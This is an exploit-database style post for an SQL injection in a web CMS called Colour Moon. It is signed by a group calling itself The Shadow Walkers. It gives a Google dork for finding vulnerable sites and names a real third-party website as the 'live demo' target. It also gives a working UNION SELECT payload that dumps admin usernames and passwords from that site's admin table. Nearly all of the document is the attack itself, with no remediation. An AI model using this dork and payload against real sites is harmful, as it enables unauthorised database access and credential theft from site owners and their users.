# Exploit Title: Colour Moon CMS - SQL Injection Vulnerability
# Google Dork: intext:" Designed By Colour Moon. " inurl:.php?id=
# Date: 2018-01-30
# Exploit Author: The Shadow Walkers
# Discovered By: Astra (motawari@tutanota.com)
# Vendor Homepage: https://thecolourmoon.com/
# Software Link: -
# Version: 1.0
# Tested on: Kali Linux
# CVE : -
---------------------------------------------------------
Demo:
http://www.paramountindia.co.in/productview.php?proid=37[SQLi]
Live Demo injected:
http://www.paramountindia.co.in/productview.php?proid=-37+Union+Select+1,2,Group_concat(username,0x3a,password),4,5,6,7,8,9,10+From+admin--+
admin page:
http://127.0.0.1/cmoon/index.php
-------------------------------------------------------------------
# Astra - Ghostman - N37iD
# https://t.me/TheShadowWalkers
# Undrground Researchers